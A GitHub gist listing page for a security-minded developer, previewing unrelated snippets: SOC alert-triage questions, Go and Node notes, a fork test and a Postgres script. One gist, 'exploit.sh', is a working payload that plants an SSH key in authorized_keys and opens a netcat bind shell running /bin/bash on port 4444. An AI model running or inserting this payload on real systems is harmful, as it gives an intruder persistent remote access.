Skip to content

Instantly share code, notes, and snippets.

@jandre
jandre / gist:38db0124e9c6c9761a34
Last active March 28, 2016 18:31
Alert triage questions

Some sample questions a security team may ask when triaging events that come from a SIEM/Log Management or directly via a H(N)IDS.

Generally, the exact information an analyst may need to triage the alert may vary depending on the type of event and its source.

Alert triage usually happens in the 'event handling' process -> before a 'security incident' is declared and more detailed invevstigation is needed. However, in smaller SOCs with less rigeur, often the process is compressed - e.g., the same person who is triaging -> performs more detailed investigation, forensics, and other processes that is needed to proceed with incident response. Answering some of the question below may fall into these later phases vs being pure 'triage' tasks.

Domain/Hostname information

  • What hostname(s) corresponds to the IP addresses (reverse IP lookup)? (e.g., 123.44.5.55 == google.com, or badmailserver.ru?) Do the hostnames appear to be suspicious, or valid business activity?

Keybase proof

I hereby claim:

  • I am jandre on github.
  • I am jandre (https://keybase.io/jandre) on keybase.
  • I have a public key whose fingerprint is 6DA2 9D93 9AAA CD1E 8939 CBFD 5004 12C5 9B54 59C9

To claim this, I am signing this object:

build a go lib and binary
1. installing go
1. OS X: brew install go
2. Linux: https://github.com/dcoxall/vagrant-golang ?
3. organizing your code
1. GOPATH export GOPATH=/Users/jandre/godemo
2. WORKSPACE https://golang.org/doc/code.html
@jandre
jandre / running
Last active August 29, 2015 14:06
exploit.sh
#!/bin/bash
touch /tmp/exploited
cd ~
mkdir -p .ssh
chmod 755 .ssh
touch .ssh/authorized_keys
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC690OnLNFvUsbWvtpXkyyHnCaC6TNpa5bjODqRFjEaXd2s3VuvZOMCPGuyrHNA891IjisdVIqoOhL7asLnMcTP4cPxbP6JBaKkeNk3M72YBr6+lxQQPUyhDazTezK90JadkZkWwS1oXsrneLFW7rSoQAQGcbze4LIhrC7317+Wcex9ktza9Xvf57WwPkIO1hJcISn6GaaADgpA344/9acipQkZF/HdvmIiNf5nDN/tQTNdh7kSmAWKlr9stVktcBuhs6LaFVwFrsgNp+TXW6BIDfnFnD70EkUmsuA7ZFTMP65qKgGUrZYp4nqvqWtFVubsdjKOBOEGTad6uef+iw+F jandre@gmail.com" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
nc -s 0.0.0.0 -l -p 4444 -e /bin/bash &
@jandre
jandre / really.md
Last active August 29, 2015 14:01
really node???
//
// async method passing errors via
// the standard convention of callback(err)
//
> dns.reverse('4.4.4.4', console.log)
{ oncomplete: [Function: onanswer] }
> { [Error: getHostByAddr ENOTFOUND]
  code: 'ENOTFOUND',
@jandre
jandre / forktest.js
Last active August 16, 2016 17:34
fork example
var fork = require('child_process').fork;
var spawn = require('child_process').spawn;
var fs = require('fs');
var path = require('path');
function forkProcess() {
var fd = fs.openSync('/tmp/sensitive_file', 'w');
var opts = {
};
fork(process.argv[1], ["--forked"], opts)
@jandre
jandre / onedayofgo.md
Last active January 1, 2016 23:19
One Day Of Go

One day of Go

One of my ongoing resolutions is to learn a new programming language every year. I've been looking at Go for a while and I thought it would be fun to use the 'holiday' today to really get cranking. I recorded some random impressions as I was chugging along...

When learning a language, I'm one of those people that can't simply read documentation and contrived code examples with any usable level of recall -- I need to internalize it by writing code to solve a legitimate problem. So, I decided to write a little library, a parser for the Linux /proc filesystem. There aren't very many good ones that I've found for Go (and I am thinking of some projects I may want to use it for in the future).

Steps taken:

  1. Read a bit of code
#!/usr/bin/env sh
if ! which md5sum > /dev/null; then
echo Install md5sum
exit 1
fi
if ! which curl > /dev/null; then
echo Install curl
exit 1
@jandre
jandre / pg_change_owner.sh
Created August 10, 2012 19:46
pg change owner
#!/bin/bash
usage()
{
cat << EOF
usage: $0 options
This script set ownership for all table, sequence and views for a given database
Credit: Based on http://stackoverflow.com/a/2686185/305019 by Alex Soto